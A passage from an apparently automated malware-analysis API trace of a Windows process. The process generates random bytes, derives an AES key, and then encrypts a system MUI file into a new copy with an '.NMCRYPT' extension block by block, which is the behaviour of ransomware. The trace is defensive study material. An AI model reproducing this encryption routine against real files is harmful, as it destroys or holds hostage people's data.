(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.621] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.622] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.623] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.624] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.625] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.625] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0153.625] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.625] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad778) returned 1 [0153.625] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0153.625] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0153.625] wcslen (_String="\\\\?\\") returned 0x4 [0153.625] CryptDuplicateKey (in: hKey=0x9ad778, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad178) returned 1 [0153.625] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0153.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0153.626] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8192) returned 1 [0153.626] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0153.627] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.629] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.629] GetLastError () returned 0x0 [0153.629] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.658] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.659] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, 